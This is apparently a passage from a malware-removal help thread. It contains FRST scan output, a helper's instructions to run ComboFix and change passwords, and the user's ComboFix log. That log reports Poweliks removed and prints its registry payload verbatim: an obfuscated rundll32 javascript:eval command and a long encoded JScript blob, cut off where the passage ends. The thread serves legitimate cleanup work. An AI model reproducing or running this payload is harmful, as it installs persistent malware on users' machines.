2014-10-15 02:32 - 2014-08-18 21:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 02:32 - 2014-08-18 21:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 02:32 - 2014-08-18 21:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 02:32 - 2014-08-18 20:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 02:32 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 02:32 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 02:32 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 02:32 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 02:32 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00005632 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-10-15 02:32 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-10-15 02:32 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 02:32 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 02:32 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 02:32 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 02:32 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 02:32 - 2014-07-06 20:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 02:32 - 2014-06-27 19:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 02:32 - 2014-06-27 19:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 02:32 - 2014-06-27 19:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-08 12:40 - 2013-11-25 22:47 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-07 04:51 - 2009-07-13 23:34 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-07 04:51 - 2009-07-13 23:34 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-07 04:50 - 2010-11-20 16:01 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-07 04:43 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-07 01:50 - 2014-04-06 08:16 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-02 01:22 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-30 19:30 - 2014-04-06 08:13 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-30 06:24 - 2013-11-25 11:49 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-27 04:55 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Globalization
2014-10-25 22:10 - 2010-11-20 19:38 - 00000000 ____D () C:\Windows\DigitalLocker
2014-10-25 15:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-25 12:39 - 2011-06-02 16:34 - 00000000 ____D () C:\Windows\Panther
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-TW
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-CN
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sv-SE
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ru-RU
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-PT
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-BR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pl-PL
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nl-NL
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nb-NO
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ko-KR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ja-JP
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\it-IT
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\hu-HU
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fr-FR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fi-FI
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\el-GR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\de-DE
2014-10-25 11:59 - 2014-02-20 19:10 - 00000000 ____D () C:\Windows\pss
2014-10-25 07:53 - 2014-02-20 19:45 - 00001067 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-10-25 07:53 - 2014-02-20 19:45 - 00001055 _____ () C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-10-25 07:49 - 2013-11-25 12:08 - 00000000 ___RD () C:\Users\Jack\Dropbox
2014-10-25 07:49 - 2013-11-25 12:01 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Dropbox
2014-10-25 07:48 - 2014-04-06 08:13 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-24 22:39 - 2014-04-06 08:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-24 22:39 - 2013-11-25 12:14 - 00001067 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-24 22:21 - 2014-04-25 22:28 - 00000005 _____ () C:\END
2014-10-24 22:18 - 2013-11-25 12:13 - 00000972 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-24 22:18 - 2013-11-25 12:13 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-24 22:10 - 2014-04-26 17:44 - 00192512 _____ () C:\Users\Jack\AppData\Local\ChromeHitoryDB
2014-10-24 20:37 - 2009-07-13 21:04 - 00000505 _____ () C:\Windows\win.ini
2014-10-18 20:29 - 2009-07-13 23:53 - 00032538 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-18 13:59 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-10-16 02:33 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 02:24 - 2009-07-13 23:46 - 00001515 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 02:23 - 2009-07-13 23:33 - 00315464 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:22 - 2014-04-30 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:04 - 2013-11-25 11:58 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:02 - 2013-11-25 11:58 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

Some content of TEMP:
====================
C:\Users\Jack\AppData\Local\Temp\UpdateFlashPlayer_7accf934.exe
C:\Users\Jack\AppData\Local\Temp\UpdateFlashPlayer_e32eb32e.exe
C:\Users\Jack\AppData\Local\Temp\wjetifgd.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-29 22:34

==================== End Of Log ============================



#8 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:05:52 PM

Posted 08 November 2014 - 12:54 PM

Hi,

warning.gif Malware Warning

All passwords should be changed immediately to include those used for banking, email, eBay, paypal and online forums from a CLEAN COMPUTER.

Step 1

Please download combofix.pngCombofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#9 Bobbie S.

Bobbie S.
  • Topic Starter

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 08 November 2014 - 04:29 PM

WOW.  That took a long time.  Must have been badly infected.  Changing passwords right now on different (clean) computer.  Here is the log.

Bobbie

 

ComboFix 14-11-03.01 - Jack 11/08/2014  15:37:53.1.2 - x86
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3062.1922 [GMT -5:00]
Running from: c:\users\Jack\Downloads\ComboFix.exe
AV: Microsoft Security Essentials *Enabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Enabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\END
c:\users\Jack\AppData\Local\acikmao.dll
c:\windows\system32\drivers\etc\hosts.txt
c:\windows\system32\icsuwxe.dll
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         #@~^k4QAAA==n{F+2i@#@&l{xAPzmOk7+p6(L+1O`r?1.rwDRUtnVsE*i@#@&S4k^+cne'c+b@#@&`@#@&7DDz@#@&i @#@&diWE mOkKx~^9x`*@#@&id @#@&7diYMX@#@&77i @#@&i7diDnO!Dx~CcIno"nmNcrCnSH'-kG0DhCD-whbmDKdW6Y-'UnY,0Mlh+AGM3~/OEa-wU9w-w-yRTRlTF {'-kwJ*i@#@&didN@#@&d771lY14`#@#@&77dP@#@&d7d7.Y;D ~!p@#@&7id8@#@&idN@#@&7i0; mDkW P9cE*@#@&di @#@&iddXxxhPz^Ok7+or8Ln^D`EHka:^  jD\n.oHJC:PhRc!r#i@#@&i7dXRGwxcEV2KrSEB0l^dn#p@#@&d7da k+UNvbi@#@&77iE0UxmR36aC N3 \bDW :UYUY.k odcr]Yhwu--rbQEc/!4dY.r ocEcslkY(U9+66WvJ&J*Q8#I@#@&idd!0 O'!0U_rROhaJi@#@&didE6Ox0cZM+CYnP6Osbs+vEWUD~Y.;~RF*I@#@&7idb0`!0Db@#@&d7dP@#@&7idd!WYcDbOn`XRM+dwGUk+$W9z#p@#@&7idd;WDR/VKd`bp@#@&ddid!W'6R/DlOn:+6Dok^+`!WU~DD!+bi@#@&id7d!WY{0 !Ysrs`;0 O*i@#@&didd!0kxE6Y ra+U)kK+XO?DD+mhc#p@#@&d7d7;6/ ICNv bI@#@&d77iEWRq.bYnvE6/R"+m[`!0ORUk"n  #*I@#@&ddi7;0kR;VG/nc*i@#@&i7diEW ;VWdnv#I@#@&7id76RG+VYok^+cE6xObp@#@&i7dilR";U`r-rJQEWU3JwJ,&;!knO,zxG./OlMOr~TBF*i@#@&di7d6R9+^+OnwkVcE6x#p@#@&did)@#@&d7N@#@&7dSxlc2a2mxN3U7k.W hxOUYMkxT/vE]SkUNbDYE*i@#@&7d6'xA~b1Yb\n(68N+^YvE?1Dr2DkxL wks+UzkYnsr(L+1Yrbi@#@&7dbv*x6RsKsND2XrdYk`S_E-wdH/AWScr#I@#@&dd2xS_E-'E3`r+cQJ/H/SGh+cE)r/zdD+:2+J*_J'wAk NKhdwGADdtsV'--qc!-w2KhnDk4Vsc+X+Jp@#@&7dStrV`ZWcsk^n2Xk/Ddcw*#@#@&7d`@#@&d7dS-'6R!nDsksnj+./bG `A3J'-xKY2l9Rn6Jb kwVbO`rRJ*I@#@&idiE['EEp@#@&di7Ea'EEp@#@&77i/AkD^4`A7$ZT#@#@&i7dP@#@&did^Ck+PrXJ=@#@&i77db0vkcb@#@&d7di`@#@&d77idE[xrtOYalJz[Kh VWmNchk1DG/K0O 1W:J[WSxVKC[zOzRzz10+FTcZO1 8{ c*C* 4[m2RON8848m*6G+zg+OsX TjhF{Xcc+6EI@#@&did7d;2{J4YD2)Jz[GSxVGC9Rhk1.K/G6YcmWsz9Gh VGl9z$&Gz,J$fOAA8ooO+vZ,Rc$qZO1&2*O+fT/l%!zb{zqr NGS/U+D7+M+!Z&R|~,0O&! avWO2g! +X+ri@#@&77idN@#@&7didnsk+@#@&7id7 @#@&id7id!N'rtDOw=z&NKhUsKlNchk1DWkGWYcmK:&NGA VGl9&!J%&^J!%^qO0Cc *1cW c604 ,9m FX!O!XF%mOnzg+Ywa+!Un8{a% 6nJp@#@&id77iEwxE4YOw=&JNGSx^Wl9RsrmMWdW6Y ^K:z9Gh VWm[&2JZJ2&2/3O,X%2R Z!fRW**9R~v0F Rf$+FZAcWbW&bx[WS/pK |AO%O&! a0v 2gM +anri@#@&i7di8@#@&idd78M+C3p@#@&@#@&idimlk+,Evr)@#@&id77khkD^tvh\]qD#@#@&id7d`@#@&d7di7mm/n~r!Jl@#@&d7di7b0cbvW#@#@&di7di @#@&id77idEaxJ4YYal&z9WSxsWC[c:rmMG/K0O 1W:&[KhUVKC9zfJZJ%z2ZR/slF3O8f19 cfz)Ozb2zRXZW%GF/fTXlZ&bUNKhdc!OF$Ov0,2T 6WRs/Eri@#@&did7d)@#@&7iddinVk+@#@&77didP@#@&d77id7EaxJ4YO2=zz[GSxsWm[c:r1DK/W6Yc^Wsz[WSxsGmNzz&GJ*zz{XA;!8GRvf/AO*GGORs)* bs$X; qAz/lc&qk NWS/+ ! |$,+%1fZO6RRs/ErI@#@&idid78@#@&id7di8DlVI@#@&d77i8@#@&i7id8M+m3i@#@&i7d)@#@&didrWvmN c#{'!*@#@&didP@#@&d77iNcE9bi@#@&77i8@#@&7id[`!2*i@#@&di8@#@&diclc2U\bDGUs+xDcJhDW1nd/r#*`ElEb{Jr+X~`]KnaDR2U^KNrxTD=))UZ&qRV+DjYMkUov$/G \+MOT=)sMGhAm/v*?O.bxL`E[Cx*9}aGf}Gx}U.!e2I2( Wo}ypg/o^G9pK9/#~tmsoY&Zt(i!sH5qFsN!#H|oA7^ ^!C OEnP)kK s!tVsT(&x*nUI`^xjVF.Zo q"*mV#4o.!TBoA4mssO}p]^mUHk F~t^hwY}p]^mrt582129M^\4N!XF.Zo F"*^!jNq;]?\(I8^h*`+oAsn#Oq4+V0p?0G9}K9Zj]`+pA^} .2(M"VmNF(}(~h]MOYe ^E(:Gv5&.H^h.!NAI-4 oa4r*At\w8hj2+ X44 VN}o1"\8k4_3KF2lV[X8nehaV52}o`&V.[!.DS^9s}ha^5fIa8 WE}pgy} qb4uV}eqFsnZx?}q}ktg!t"2t XV}yo!\?qaFj6(j2V"N!#DSs9^t:XVef"w4+*!I Fa[;*$1&gV4q9knjxFCX3tpxA5yHV1&196%wUNqc2SV]^}hV!tj"*8hwYl Hg4+I88VjG&3^EKq.D8&x*PO3[ XVqbA3\:sk^+jaS0Is}hs!}#Il^M`W(U5kS/BG4!s.^H6}9x/lqHki jt8Mj3J3wEmysf(Ms.^z6~NoI-p+a4mfHbJsDKnpg!} T!Kp.k[VV%I(g!IV.kt9t[MjNFPk1ZTV9xsIl^!.;NqVd}!#HSVI^t:^Etig\4UHZmU.N[V,znZx?.w1StgweXre 8VSA4w\M.;n#1a}H6}N Bkl HbJsDKnpg!} T!jh.s8V.%9M^\4b*GeX/Clx}+OENs#E9MV78U19rNwPN!o!}!sHtZS3i!wX5 q^N!.H^H3;` j!?qFS8MjYtl!ep"w4yXM(Ms ^zobj .;N!sD}j6geltt+j3qrVFf}Wx/UIi(~Vp .a8M"V^kl2t \w4s#1\(IK8+pKq0V;Nh1M}jqk(V~FehXw5za&l I^} VPm1/Ks.2i X\[ZXCpx!Nqo/&kh0ih.ZNo9;.usS}jh0iMwXe 8VN!#Hmz3!iy.TU8h4V.Dtl!e("w8+lM4Vox1XobiU.!NVVO}jag5 *4t j3(r0Gf}GxZp9^[_.z(kz3._VStjxFCX3tp&Ep2BVI(I^#uVS}Uo2rATnZp!g/o^:[ lLN!s74rA e5!F;(k1ZT3xiMwXeZoFoDp5oBt(.ZtpqKjV,"lp]a4+cO\ZX1e l35p]7mU3OBwIz9`w(UA(i&"XClxpjz3Kq1396^JoY55o944 #Z}pqKiMOyCp"w4+*OHj6geq*VI("\m 3OBs"X[`wpj~4j2]Xm* pjb0j_9-5+#0Np9^FKk1/L099oHlmfI^8`s"1 jY5s6lK.DA^C~28+8tlqXN}LwG[p9H}q*TI!1D5 V!J39V[3wym+#D5h6atoHGn(X(lV.Ht?8ne:aVef"G9w0E" 67ehskpo1"} qb4uVGegWtjzYp X0q/I6J06-I w!lq,!JVgh8M^!F/xmqbs4dKs9JV.XNqsdmzLbjfV.[MjYJh"/4/(a0P/g/T3BxsjEmysstjlt[M^ ti8VNV4\\CHOBo1lm2Is4io.m+.De:X*JV9VNo]lm!jK(0F2I&x\my,s[Zl(CWy\rl.4 Ht\:.}epIaNs.H}p]K4+I.(k0G9}K9ZpB^Nu.H8bbVjly5q}^P:w!C(\VP j!lV131X*_tpIg}oIG4+}KqVN^[s~X8+gA}!]H}p1.(b3;Ul 4yY^FZ"E[X/J3zW8H*1&I^8j*UNq*Tl q^SVV![MjX8f~K}pByl 1^^H*(Il34V.Ut\NF2lV[z8n5s2VI&pTifV.NV.OSsB84UIa8`Ej l!}pB7mo1^^ }2I jyS0t48:"/t.xVtrTWKs#&dj,bCh.NN;AB4U]5NuqaJZ".8Ugt}h#}5pIa[s.H\("W4yI.J39V[28V[!4\};Lk" .ZP ,0Nq6s?!o!}!6^(k0Ej l 4+O^|/I![q6dd2zW9AF7tCj/t?0wFj0/9w$X( 1^tu.H}U32rATnZp!g/o^4}U^!}#O9(jb0^GF85 OENs.H[sZv63\X8+8Z5oHVgLI:[u9a4smGqst\NU1 F&4\e 8! oD.hFa#jNtj!9h+jw782\Y8M46eh8t?^BlsV48#}Dlj.p}#[_mu1m8 XM8T\WmiTH5iwUe`wtIa|4qVj# D(] OF hO/I $/mCsm]+snjssG oD+!Fa#.96#T9t?sB4+!Fa#jNqq3DsNZs~}jwc\s4A#h8/+q]1\2}Wjo}K50.(?oBNlu1b]y^;n!D5KioxN3sA]0,39!wc.2oS swj]y^W V83INosCA\8V6&jsIGl!H!439WCF4L}i83IUHw}!60]0I(`:x?+qqHP3xc\s1! V9?+j2(I3tUeUt+5.tCIUt pT6l]:jH}q9tI!#:NqV0i8N\IF"fK^}mt&K\n(\*Csx?|ys/`.}D]3wj}^w5HU[ZrPs;C j2Jf9c+Pt7j/,Ajw2q:y4WHow7[s\fj("fi3^!I`#qmjImthN~p:tJK!#GpT6N}x^H#TgKKoo;}TpWt8A45?O6?sI^Cja5t(^|ihjKI [An!. tTs~p`,"K!VXI#3y6M8H !j*K!]^li6UtsV\"2^Lj_I2i3"wnVgCt"x5rAoA`2Ya#PHSl^.eji37?pAUtVgHih\*Ko4sjipHjoAo5:"A1^9;\Fw3iW\ih\*IVt:9!*N[#NA}s}fKh]"KTw0tjg|#!\KKs]bppw2}y66}j^!KNVx^MgZe3w2ni"h5Z]k5Ls;CT1A|Z2X+PeZj9IA\Fj2C#45Nz0S9Ia\woT:y~5ly17#!l?e!xI#pI*.N499fsGjp.^j`9opiox?3N;}3jA}i9hp o~ppN~}`s3t&I*+^._8!A\6jg|ih\wI [An!.VtT.~p`VTKotxKhhl}jgHFq~nlT}2}36Vj:s#"FgA+ Vo K9K[FavPP"!?ZH91&Vh69jHpq,+K+4N49AV (5*}T^!+i]x?3t;}0.$5jwpHy3.8!jAJ av^3ADH8H&Ik,Uts1ANyVU1#]sjUV+ ("&i3wpN+VZ1Vs~}`s$\yg&p0I~}L~K KAc}#w*KA]&`2Vjt%Vq1AVdI%#x3s0}&jH u9IIo4slU9&8213mMgZ1`9"Fyg&P&gqCPzy1V2.`jV~83p7}V.iSqtspTw~Hs~2}V^11To&!Ia\woT\y4L.qN+62w3exjHCUwIp`oA5!w`ti1tl s$pio~pThH}&"VPVwp? ^H9A~P2HzmKw5}Z,q f~LnV9r#U\;jNtE`V$ !Yxlj}eNT}25qtm8F4Kt3w*p%]yroA~}`s3t2w1j0sU^j"c[!S\#!\ZH:#A"L2l}#Ahl:1oI 4s%s2HC"9i3^!KiHGlus~]y,/dyg.?`2WCkRht(gfPP4Z}^4/93w2C3s~.^V+m+^M+!,48("}e 84 sj.qVo]2AXq:O/IsFkCCwk8w|isacqoYj:Fa##N^.ZNAmq2743}7]:46PPxt?sB4?sV4C0wOm.j(l8N_8&jl8 XM^!XWmj2CIjwUe t\5qF*4 sj.fso] w|ihwc4 sj.f.mjZ.f5jwApooS 2w8X*t383I 4qj:tb]it&js1Gm+B_r wWCF41}i^!pi]VKTI2}otpf~5jjI_64lP"M\ijcmwsE:2tUt!tK5y*dpU4M!1~P"M^Tj34!]VI3tUe^9XILxrp oS#y"l]Fx* s9k?wBkCwN6owVNsN9KusV}i6G# w2t#g& ]:.T6N#A16jVax+b,l[x^;iV&DC XI.sq2UV.s hWHN2pXHiBM}ip7[&4*HhOpST]&jP.h6Voa:O!.01x[2gpj("s]i4wIw2:\!s~63yt}`19k!h;+i6o}fghiixxi94 